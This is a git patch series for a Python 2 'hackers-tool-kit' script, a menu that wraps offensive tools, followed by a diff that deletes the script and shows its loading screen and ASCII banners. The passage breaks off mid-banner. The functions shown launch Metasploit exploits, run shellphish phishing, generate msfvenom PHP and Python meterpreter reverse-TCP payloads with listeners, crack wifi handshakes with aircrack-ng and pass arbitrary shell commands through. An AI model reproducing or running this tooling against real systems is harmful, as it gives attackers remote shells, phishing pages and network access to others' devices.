os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#PYLOAD START# +#------------# +def pyload(): + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> pyload.rc') + os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') + os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) + os.system('echo "exploit\n" >> pyload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r pyload.rc') + os.system('rm -rf pyload.rc') + if yn == "n": + os.system('echo " "') +#----------# +#PYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 336d13a6b3187e2c620486a118695bccde11a682 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 27 May 2019 03:58:36 +0100 Subject: [PATCH 148/214] Delete htk.py --- htk.py | 2920 -------------------------------------------------------- 1 file changed, 2920 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 8f42e38..0000000 --- a/htk.py +++ /dev/null @@ -1,2920 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - 